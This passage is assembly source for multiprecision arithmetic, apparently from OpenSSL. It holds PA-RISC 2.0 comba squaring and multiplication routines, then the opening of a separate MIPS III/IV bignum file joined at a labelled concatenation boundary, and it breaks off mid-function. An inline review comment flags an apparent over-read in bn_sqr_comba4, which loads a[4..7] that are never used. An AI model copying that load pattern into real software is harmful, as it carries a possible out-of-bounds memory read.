b1L .reg %fr31L
b1R .reg %fr31R
;
; Temporary floating point variables, these are all caller save
; registers
;
ftemp1 .reg %fr4
ftemp2 .reg %fr5
ftemp3 .reg %fr6
ftemp4 .reg %fr7
;
; The B set of registers when used.
;
b2 .reg %fr8
b2L .reg %fr8L
b2R .reg %fr8R
b3 .reg %fr9
b3L .reg %fr9L
b3R .reg %fr9R
b4 .reg %fr10
b4L .reg %fr10L
b4R .reg %fr10R
b5 .reg %fr11
b5L .reg %fr11L
b5R .reg %fr11R
b6 .reg %fr12
b6L .reg %fr12L
b6R .reg %fr12R
b7 .reg %fr13
b7L .reg %fr13L
b7R .reg %fr13R
c1 .reg %r21 ; only reg
temp1 .reg %r20 ; only reg
temp2 .reg %r19 ; only reg
temp3 .reg %r31 ; only reg
m1 .reg %r28
c2 .reg %r23
high_one .reg %r1
ht .reg %r6
lt .reg %r5
m .reg %r4
c3 .reg %r3
; SQR_ADD_C: (C3,C2,C1) += square of the 64-bit value whose high word is
; A0L and low word is A0R.  The cross product m = A0L*A0R appears twice
; in the square, so it is added shifted left 33 (low part) with its high
; part folded in via the mask/extract pair.  Clobbers ftemp1-3, m, lt, ht,
; temp1-3 and stack slots -8/-16/-24(%sp).
SQR_ADD_C .macro A0L,A0R,C1,C2,C3
XMPYU A0L,A0R,ftemp1 ; m = ht*lt (cross product, counted twice)
FSTD ftemp1,-24(%sp) ; store m
XMPYU A0R,A0R,ftemp2 ; lt = lt*lt
FSTD ftemp2,-16(%sp) ; store lt
XMPYU A0L,A0L,ftemp3 ; ht = ht*ht
FSTD ftemp3,-8(%sp) ; store ht
LDD -24(%sp),m ; load m
AND m,high_mask,temp2 ; m & Mask
DEPD,Z m,30,31,temp3 ; m << 32+1 (i.e. 2*m << 32, low half)
LDD -16(%sp),lt ; lt
LDD -8(%sp),ht ; ht
EXTRD,U temp2,32,33,temp1 ; temp1 = m&Mask >> 32-1 (2*m, high half)
ADD temp3,lt,lt ; lt = lt+m
ADD,L ht,temp1,ht ; ht += temp1
ADD,DC ht,%r0,ht ; ht++ (fold carry from lt)
ADD C1,lt,C1 ; c1=c1+lt
ADD,DC ht,%r0,ht ; ht++ (fold carry from c1)
ADD C2,ht,C2 ; c2=c2+ht
ADD,DC C3,%r0,C3 ; c3++
.endm
; SQR_ADD_C2: (C3,C2,C1) += 2 * A * B for the 64-bit values A (A0L:A0R)
; and B (A1L:A1R) — the off-diagonal comba term, which is doubled in
; place (ADD ht,ht / ADD lt,lt) before being accumulated.  The *NUV
; conditional nullifies the LDO 1(C3) unless the doubling overflowed.
; Clobbers ftemp1-4, m, m1, lt, ht, temp1, temp3 and stack slots
; -8/-16/-24/-32(%sp).
SQR_ADD_C2 .macro A0L,A0R,A1L,A1R,C1,C2,C3
XMPYU A0L,A1R,ftemp1 ; m1 = bl*ht
FSTD ftemp1,-16(%sp) ;
XMPYU A0R,A1L,ftemp2 ; m = bh*lt
FSTD ftemp2,-8(%sp) ;
XMPYU A0R,A1R,ftemp3 ; lt = bl*lt
FSTD ftemp3,-32(%sp)
XMPYU A0L,A1L,ftemp4 ; ht = bh*ht
FSTD ftemp4,-24(%sp) ;
LDD -8(%sp),m ; m
LDD -16(%sp),m1 ; m1
ADD,L m,m1,m ; m+m1
DEPD,Z m,31,32,temp3 ; (m+m1)<<32, low contribution
LDD -24(%sp),ht ; ht
CMPCLR,*>>= m,m1,%r0 ; if (m < m1) the m+m1 sum wrapped:
ADD,L ht,high_one,ht ; ht+=high_one
EXTRD,U m,31,32,temp1 ; m >> 32
LDD -32(%sp),lt ; lt
ADD,L ht,temp1,ht ; ht+= m>>32
ADD lt,temp3,lt ; lt = lt+m1
ADD,DC ht,%r0,ht ; ht++
ADD ht,ht,ht ; ht=ht+ht; (double the term)
ADD,DC C3,%r0,C3 ; add in carry (c3++)
ADD lt,lt,lt ; lt=lt+lt; (double the term)
ADD,DC ht,%r0,ht ; add in carry (ht++)
ADD C1,lt,C1 ; c1=c1+lt
ADD,DC,*NUV ht,%r0,ht ; add in carry (ht++)
LDO 1(C3),C3 ; bump c3 if overflow,nullify otherwise
ADD C2,ht,C2 ; c2 = c2 + ht
ADD,DC C3,%r0,C3 ; add in carry (c3++)
.endm
;
;void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a)
; arg0 = r_ptr
; arg1 = a_ptr
;
;
; r[0..15] = a[0..7]^2  (8-word comba squaring).
; Diagonal terms via SQR_ADD_C, doubled off-diagonal terms via
; SQR_ADD_C2; c1/c2/c3 rotate as each result word is stored.
; a0..a7 live in caller-save FP regs fr22-fr29, so no FP saves needed.
;
bn_sqr_comba8
.PROC
.CALLINFO FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_sqr_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.ENTRY
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z -1,32,33,high_mask ; Create Mask 0xffffffff80000000L
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 32(a_ptr),a4
FLDD 40(a_ptr),a5
FLDD 48(a_ptr),a6
FLDD 56(a_ptr),a7
SQR_ADD_C a0L,a0R,c1,c2,c3
STD c1,0(r_ptr) ; r[0] = c1;
COPY %r0,c1
SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
STD c2,8(r_ptr) ; r[1] = c2;
COPY %r0,c2
SQR_ADD_C a1L,a1R,c3,c1,c2
SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
STD c3,16(r_ptr) ; r[2] = c3;
COPY %r0,c3
SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
STD c1,24(r_ptr) ; r[3] = c1;
COPY %r0,c1
SQR_ADD_C a2L,a2R,c2,c3,c1
SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
SQR_ADD_C2 a4L,a4R,a0L,a0R,c2,c3,c1
STD c2,32(r_ptr) ; r[4] = c2;
COPY %r0,c2
SQR_ADD_C2 a5L,a5R,a0L,a0R,c3,c1,c2
SQR_ADD_C2 a4L,a4R,a1L,a1R,c3,c1,c2
SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
STD c3,40(r_ptr) ; r[5] = c3;
COPY %r0,c3
SQR_ADD_C a3L,a3R,c1,c2,c3
SQR_ADD_C2 a4L,a4R,a2L,a2R,c1,c2,c3
SQR_ADD_C2 a5L,a5R,a1L,a1R,c1,c2,c3
SQR_ADD_C2 a6L,a6R,a0L,a0R,c1,c2,c3
STD c1,48(r_ptr) ; r[6] = c1;
COPY %r0,c1
SQR_ADD_C2 a7L,a7R,a0L,a0R,c2,c3,c1
SQR_ADD_C2 a6L,a6R,a1L,a1R,c2,c3,c1
SQR_ADD_C2 a5L,a5R,a2L,a2R,c2,c3,c1
SQR_ADD_C2 a4L,a4R,a3L,a3R,c2,c3,c1
STD c2,56(r_ptr) ; r[7] = c2;
COPY %r0,c2
SQR_ADD_C a4L,a4R,c3,c1,c2
SQR_ADD_C2 a5L,a5R,a3L,a3R,c3,c1,c2
SQR_ADD_C2 a6L,a6R,a2L,a2R,c3,c1,c2
SQR_ADD_C2 a7L,a7R,a1L,a1R,c3,c1,c2
STD c3,64(r_ptr) ; r[8] = c3;
COPY %r0,c3
SQR_ADD_C2 a7L,a7R,a2L,a2R,c1,c2,c3
SQR_ADD_C2 a6L,a6R,a3L,a3R,c1,c2,c3
SQR_ADD_C2 a5L,a5R,a4L,a4R,c1,c2,c3
STD c1,72(r_ptr) ; r[9] = c1;
COPY %r0,c1
SQR_ADD_C a5L,a5R,c2,c3,c1
SQR_ADD_C2 a6L,a6R,a4L,a4R,c2,c3,c1
SQR_ADD_C2 a7L,a7R,a3L,a3R,c2,c3,c1
STD c2,80(r_ptr) ; r[10] = c2;
COPY %r0,c2
SQR_ADD_C2 a7L,a7R,a4L,a4R,c3,c1,c2
SQR_ADD_C2 a6L,a6R,a5L,a5R,c3,c1,c2
STD c3,88(r_ptr) ; r[11] = c3;
COPY %r0,c3
SQR_ADD_C a6L,a6R,c1,c2,c3
SQR_ADD_C2 a7L,a7R,a5L,a5R,c1,c2,c3
STD c1,96(r_ptr) ; r[12] = c1;
COPY %r0,c1
SQR_ADD_C2 a7L,a7R,a6L,a6R,c2,c3,c1
STD c2,104(r_ptr) ; r[13] = c2;
COPY %r0,c2
SQR_ADD_C a7L,a7R,c3,c1,c2
STD c3, 112(r_ptr) ; r[14] = c3
STD c1, 120(r_ptr) ; r[15] = c1
.EXIT
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3 and pop frame (in BVE delay slot)
.PROCEND
;-----------------------------------------------------------------------------
;
;void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
; arg0 = r_ptr
; arg1 = a_ptr
;
bn_sqr_comba4
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_sqr_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
;
; void bn_sqr_comba4(BN_ULONG *r, BN_ULONG *a)
; Comba-style 4x4 squaring: r[0..7] = a[0..3]^2.
; Carries are accumulated in the rotating triple (c1,c2,c3); each
; SQR_ADD_C/SQR_ADD_C2 macro adds one (doubled) partial product into
; the current column.
;
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z -1,32,33,high_mask ; Create Mask 0xffffffff80000000L
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
; NOTE(review): only a[0..3] are needed for a 4-word square, yet the
; next four loads read a[4..7] — an apparent over-read past the input
; array (the values are never used). TODO confirm against callers.
FLDD 32(a_ptr),a4
FLDD 40(a_ptr),a5
FLDD 48(a_ptr),a6
FLDD 56(a_ptr),a7
SQR_ADD_C a0L,a0R,c1,c2,c3
STD c1,0(r_ptr) ; r[0] = c1;
COPY %r0,c1
SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
STD c2,8(r_ptr) ; r[1] = c2;
COPY %r0,c2
SQR_ADD_C a1L,a1R,c3,c1,c2
SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
STD c3,16(r_ptr) ; r[2] = c3;
COPY %r0,c3
SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
STD c1,24(r_ptr) ; r[3] = c1;
COPY %r0,c1
SQR_ADD_C a2L,a2R,c2,c3,c1
SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
STD c2,32(r_ptr) ; r[4] = c2;
COPY %r0,c2
SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
STD c3,40(r_ptr) ; r[5] = c3;
COPY %r0,c3
SQR_ADD_C a3L,a3R,c1,c2,c3
STD c1,48(r_ptr) ; r[6] = c1;
STD c2,56(r_ptr) ; r[7] = c2;
.EXIT
; Epilogue: callee-saved registers were stored relative to the old %sp,
; which is now 128 bytes below the current %sp, hence the negative offsets.
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3 and pop the frame (in the branch delay slot)
.PROCEND
;---------------------------------------------------------------------------
;
; MUL_ADD_C A0L,A0R,B0L,B0R,C1,C2,C3
;
; One Comba step: computes the 64x64 -> 128-bit product of the word
; whose 32-bit halves are (A0L:A0R) and the word (B0L:B0R), using four
; 32x32->64 FPU multiplies (XMPYU), then adds the 128-bit result into
; the running column accumulators: C1 += low, C2 += high (+carry),
; C3 += carry.  Partial products are staged through the stack because
; XMPYU results live in FP registers.
; Clobbers: ftemp1-ftemp4, m, m1, ht, lt, temp1, temp3, and 32 bytes
; below %sp.  Relies on high_one == 1<<32 being preset by the caller.
;
MUL_ADD_C .macro A0L,A0R,B0L,B0R,C1,C2,C3
XMPYU A0L,B0R,ftemp1 ; m1 = bl*ht
FSTD ftemp1,-16(%sp) ;
XMPYU A0R,B0L,ftemp2 ; m = bh*lt
FSTD ftemp2,-8(%sp) ;
XMPYU A0R,B0R,ftemp3 ; lt = bl*lt
FSTD ftemp3,-32(%sp)
XMPYU A0L,B0L,ftemp4 ; ht = bh*ht
FSTD ftemp4,-24(%sp) ;
LDD -8(%sp),m ; r21 = m
LDD -16(%sp),m1 ; r19 = m1
ADD,L m,m1,m ; m+m1
DEPD,Z m,31,32,temp3 ; (m+m1<<32)
LDD -24(%sp),ht ; r24 = ht
CMPCLR,*>>= m,m1,%r0 ; if (m < m1)
ADD,L ht,high_one,ht ; ht+=high_one
EXTRD,U m,31,32,temp1 ; m >> 32
LDD -32(%sp),lt ; lt
ADD,L ht,temp1,ht ; ht+= m>>32
ADD lt,temp3,lt ; lt = lt+m1
ADD,DC ht,%r0,ht ; ht++
ADD C1,lt,C1 ; c1=c1+lt
ADD,DC ht,%r0,ht ; bump c3 if overflow,nullify otherwise
ADD C2,ht,C2 ; c2 = c2 + ht
ADD,DC C3,%r0,C3 ; add in carry (c3++)
.endm
;
;void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
; arg0 = r_ptr
; arg1 = a_ptr
; arg2 = b_ptr
;
bn_mul_comba8
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_mul_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
;
; void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
; Comba-style 8x8 multiply: r[0..15] = a[0..7] * b[0..7].
; All 16 input words are preloaded into FP registers; each output word
; is the sum of one anti-diagonal of partial products, accumulated via
; MUL_ADD_C into the rotating carry triple (c1,c2,c3).
;
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
FSTD %fr12,32(%sp) ; save fr12
FSTD %fr13,40(%sp) ; save fr13
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 32(a_ptr),a4
FLDD 40(a_ptr),a5
FLDD 48(a_ptr),a6
FLDD 56(a_ptr),a7
FLDD 0(b_ptr),b0
FLDD 8(b_ptr),b1
FLDD 16(b_ptr),b2
FLDD 24(b_ptr),b3
FLDD 32(b_ptr),b4
FLDD 40(b_ptr),b5
FLDD 48(b_ptr),b6
FLDD 56(b_ptr),b7
MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
STD c1,0(r_ptr) ; r[0] = a0*b0
COPY %r0,c1
MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
STD c2,8(r_ptr) ; r[1] = column 1 sum
COPY %r0,c2
MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
STD c3,16(r_ptr) ; r[2] = column 2 sum
COPY %r0,c3
MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
STD c1,24(r_ptr) ; r[3] = column 3 sum
COPY %r0,c1
MUL_ADD_C a4L,a4R,b0L,b0R,c2,c3,c1
MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
MUL_ADD_C a0L,a0R,b4L,b4R,c2,c3,c1
STD c2,32(r_ptr) ; r[4] = column 4 sum
COPY %r0,c2
MUL_ADD_C a0L,a0R,b5L,b5R,c3,c1,c2
MUL_ADD_C a1L,a1R,b4L,b4R,c3,c1,c2
MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
MUL_ADD_C a4L,a4R,b1L,b1R,c3,c1,c2
MUL_ADD_C a5L,a5R,b0L,b0R,c3,c1,c2
STD c3,40(r_ptr) ; r[5] = column 5 sum
COPY %r0,c3
MUL_ADD_C a6L,a6R,b0L,b0R,c1,c2,c3
MUL_ADD_C a5L,a5R,b1L,b1R,c1,c2,c3
MUL_ADD_C a4L,a4R,b2L,b2R,c1,c2,c3
MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
MUL_ADD_C a2L,a2R,b4L,b4R,c1,c2,c3
MUL_ADD_C a1L,a1R,b5L,b5R,c1,c2,c3
MUL_ADD_C a0L,a0R,b6L,b6R,c1,c2,c3
STD c1,48(r_ptr) ; r[6] = column 6 sum
COPY %r0,c1
MUL_ADD_C a0L,a0R,b7L,b7R,c2,c3,c1
MUL_ADD_C a1L,a1R,b6L,b6R,c2,c3,c1
MUL_ADD_C a2L,a2R,b5L,b5R,c2,c3,c1
MUL_ADD_C a3L,a3R,b4L,b4R,c2,c3,c1
MUL_ADD_C a4L,a4R,b3L,b3R,c2,c3,c1
MUL_ADD_C a5L,a5R,b2L,b2R,c2,c3,c1
MUL_ADD_C a6L,a6R,b1L,b1R,c2,c3,c1
MUL_ADD_C a7L,a7R,b0L,b0R,c2,c3,c1
STD c2,56(r_ptr) ; r[7] = column 7 sum
COPY %r0,c2
MUL_ADD_C a7L,a7R,b1L,b1R,c3,c1,c2
MUL_ADD_C a6L,a6R,b2L,b2R,c3,c1,c2
MUL_ADD_C a5L,a5R,b3L,b3R,c3,c1,c2
MUL_ADD_C a4L,a4R,b4L,b4R,c3,c1,c2
MUL_ADD_C a3L,a3R,b5L,b5R,c3,c1,c2
MUL_ADD_C a2L,a2R,b6L,b6R,c3,c1,c2
MUL_ADD_C a1L,a1R,b7L,b7R,c3,c1,c2
STD c3,64(r_ptr) ; r[8] = column 8 sum
COPY %r0,c3
MUL_ADD_C a2L,a2R,b7L,b7R,c1,c2,c3
MUL_ADD_C a3L,a3R,b6L,b6R,c1,c2,c3
MUL_ADD_C a4L,a4R,b5L,b5R,c1,c2,c3
MUL_ADD_C a5L,a5R,b4L,b4R,c1,c2,c3
MUL_ADD_C a6L,a6R,b3L,b3R,c1,c2,c3
MUL_ADD_C a7L,a7R,b2L,b2R,c1,c2,c3
STD c1,72(r_ptr) ; r[9] = column 9 sum
COPY %r0,c1
MUL_ADD_C a7L,a7R,b3L,b3R,c2,c3,c1
MUL_ADD_C a6L,a6R,b4L,b4R,c2,c3,c1
MUL_ADD_C a5L,a5R,b5L,b5R,c2,c3,c1
MUL_ADD_C a4L,a4R,b6L,b6R,c2,c3,c1
MUL_ADD_C a3L,a3R,b7L,b7R,c2,c3,c1
STD c2,80(r_ptr) ; r[10] = column 10 sum
COPY %r0,c2
MUL_ADD_C a4L,a4R,b7L,b7R,c3,c1,c2
MUL_ADD_C a5L,a5R,b6L,b6R,c3,c1,c2
MUL_ADD_C a6L,a6R,b5L,b5R,c3,c1,c2
MUL_ADD_C a7L,a7R,b4L,b4R,c3,c1,c2
STD c3,88(r_ptr) ; r[11] = column 11 sum
COPY %r0,c3
MUL_ADD_C a7L,a7R,b5L,b5R,c1,c2,c3
MUL_ADD_C a6L,a6R,b6L,b6R,c1,c2,c3
MUL_ADD_C a5L,a5R,b7L,b7R,c1,c2,c3
STD c1,96(r_ptr) ; r[12] = column 12 sum
COPY %r0,c1
MUL_ADD_C a6L,a6R,b7L,b7R,c2,c3,c1
MUL_ADD_C a7L,a7R,b6L,b6R,c2,c3,c1
STD c2,104(r_ptr) ; r[13] = column 13 sum
COPY %r0,c2
MUL_ADD_C a7L,a7R,b7L,b7R,c3,c1,c2
STD c3,112(r_ptr) ; r[14] = low half of a7*b7 column
STD c1,120(r_ptr) ; r[15] = final carry
.EXIT
; Epilogue: saves were made relative to the old %sp (now %sp-128).
FLDD -88(%sp),%fr13
FLDD -96(%sp),%fr12
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3 and pop the frame (in the branch delay slot)
.PROCEND
;-----------------------------------------------------------------------------
;
;void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
; arg0 = r_ptr
; arg1 = a_ptr
; arg2 = b_ptr
;
bn_mul_comba4
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_mul_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
;
; void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
; Comba-style 4x4 multiply: r[0..7] = a[0..3] * b[0..3].
; Same column-accumulation scheme as bn_mul_comba8 above, one
; MUL_ADD_C per partial product, carries rotate through (c1,c2,c3).
;
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
FSTD %fr12,32(%sp) ; save fr12
FSTD %fr13,40(%sp) ; save fr13
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 0(b_ptr),b0
FLDD 8(b_ptr),b1
FLDD 16(b_ptr),b2
FLDD 24(b_ptr),b3
MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
STD c1,0(r_ptr) ; r[0] = a0*b0
COPY %r0,c1
MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
STD c2,8(r_ptr) ; r[1] = column 1 sum
COPY %r0,c2
MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
STD c3,16(r_ptr) ; r[2] = column 2 sum
COPY %r0,c3
MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
STD c1,24(r_ptr) ; r[3] = column 3 sum
COPY %r0,c1
MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
STD c2,32(r_ptr) ; r[4] = column 4 sum
COPY %r0,c2
MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
STD c3,40(r_ptr) ; r[5] = column 5 sum
COPY %r0,c3
MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
STD c1,48(r_ptr) ; r[6] = low half of a3*b3 column
STD c2,56(r_ptr) ; r[7] = final carry
.EXIT
; Epilogue: saves were made relative to the old %sp (now %sp-128).
FLDD -88(%sp),%fr13
FLDD -96(%sp),%fr12
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3 and pop the frame (in the branch delay slot)
.PROCEND
;--- not PIC .SPACE $TEXT$
;--- not PIC .SUBSPA $CODE$
;--- not PIC .SPACE $PRIVATE$,SORT=16
;--- not PIC .IMPORT $global$,DATA
;--- not PIC .SPACE $TEXT$
;--- not PIC .SUBSPA $CODE$
;--- not PIC .SUBSPA $LIT$,ACCESS=0x2c
;--- not PIC C$7
;--- not PIC .ALIGN 8
;--- not PIC .STRINGZ "Division would overflow (%d)\n"
.END
/*
 * ---- concatenation boundary (scrape artifact) ----
 * The PA-RISC 2.0 module above ends at its .END directive.  What follows
 * is a different source file:
 *   shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/mips3.s
 * (MIPS III/IV ISA bignum primitives, repo AIFM-sys/AIFM, 37,614 bytes).
 */
.rdata
.asciiz "mips3.s, Version 1.1"
.asciiz "MIPS III/IV ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
/*
* ====================================================================
* Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
* project.
*
* Rights for redistribution and usage in source and binary forms are
* granted according to the OpenSSL license. Warranty of any kind is
* disclaimed.
* ====================================================================
*/
/*
 * This is my modest contribution to the OpenSSL project (see
* http://www.openssl.org/ for more information about it) and is
* a drop-in MIPS III/IV ISA replacement for crypto/bn/bn_asm.c
* module. For updates see http://fy.chalmers.se/~appro/hpe/.
*
* The module is designed to work with either of the "new" MIPS ABI(5),
 * namely N32 or N64, offered by IRIX 6.x. It's not meant to work under
* IRIX 5.x not only because it doesn't support new ABIs but also
* because 5.x kernels put R4x00 CPU into 32-bit mode and all those
* 64-bit instructions (daddu, dmultu, etc.) found below gonna only
* cause illegal instruction exception:-(
*
* In addition the code depends on preprocessor flags set up by MIPSpro
* compiler driver (either as or cc) and therefore (probably?) can't be
* compiled by the GNU assembler. GNU C driver manages fine though...
* I mean as long as -mmips-as is specified or is the default option,
* because then it simply invokes /usr/bin/as which in turn takes
* perfect care of the preprocessor definitions. Another neat feature
* offered by the MIPSpro assembler is an optimization pass. This gave
* me the opportunity to have the code looking more regular as all those
* architecture dependent instruction rescheduling details were left to
* the assembler. Cool, huh?
*
* Performance improvement is astonishing! 'apps/openssl speed rsa dsa'
* goes way over 3 times faster!
*
* <appro@fy.chalmers.se>
*/
#include <asm.h>
#include <regdef.h>
#if _MIPS_ISA>=4
#define MOVNZ(cond,dst,src) \
movn dst,src,cond
#else
#define MOVNZ(cond,dst,src) \
.set noreorder; \
bnezl cond,.+8; \
move dst,src; \
.set reorder
#endif
.text
.set noat
.set reorder
#define MINUS4 v1
.align 5
LEAF(bn_mul_add_words)
/*
 * BN_ULONG bn_mul_add_words(BN_ULONG *rp, const BN_ULONG *ap, int num, BN_ULONG w)
 *   rp[i] += ap[i] * w for i in [0,num); returns the final carry word in v0.
 * Registers: a0=rp, a1=ap, a2=num, a3=w.
 * Main loop is 4-way unrolled; the tail handles num%4 words.
 * Branch-likely (bgtzl/bnezl) forms execute the delay-slot load only
 * when the branch is taken, so the scheduling below is load-ahead.
 */
.set noreorder
bgtzl a2,.L_bn_mul_add_words_proceed
ld t0,0(a1)
jr ra
move v0,zero
.set reorder
.L_bn_mul_add_words_proceed:
li MINUS4,-4
and ta0,a2,MINUS4
move v0,zero
beqz ta0,.L_bn_mul_add_words_tail
.L_bn_mul_add_words_loop:
/* Each word: t = rp[i] + carry; t += lo(ap[i]*w); carry = hi + overflows. */
dmultu t0,a3
ld t1,0(a0)
ld t2,8(a1)
ld t3,8(a0)
ld ta0,16(a1)
ld ta1,16(a0)
daddu t1,v0
sltu v0,t1,v0 /* All manuals say it "compares 32-bit
* values", but it seems to work fine
* even on 64-bit registers. */
mflo AT
mfhi t0
daddu t1,AT
daddu v0,t0
sltu AT,t1,AT
sd t1,0(a0)
daddu v0,AT
dmultu t2,a3
ld ta2,24(a1)
ld ta3,24(a0)
daddu t3,v0
sltu v0,t3,v0
mflo AT
mfhi t2
daddu t3,AT
daddu v0,t2
sltu AT,t3,AT
sd t3,8(a0)
daddu v0,AT
dmultu ta0,a3
subu a2,4
PTR_ADD a0,32
PTR_ADD a1,32
daddu ta1,v0
sltu v0,ta1,v0
mflo AT
mfhi ta0
daddu ta1,AT
daddu v0,ta0
sltu AT,ta1,AT
sd ta1,-16(a0)
daddu v0,AT
dmultu ta2,a3
and ta0,a2,MINUS4
daddu ta3,v0
sltu v0,ta3,v0
mflo AT
mfhi ta2
daddu ta3,AT
daddu v0,ta2
sltu AT,ta3,AT
sd ta3,-8(a0)
daddu v0,AT
.set noreorder
bgtzl ta0,.L_bn_mul_add_words_loop
ld t0,0(a1)
bnezl a2,.L_bn_mul_add_words_tail
ld t0,0(a1)
.set reorder
.L_bn_mul_add_words_return:
jr ra
.L_bn_mul_add_words_tail:
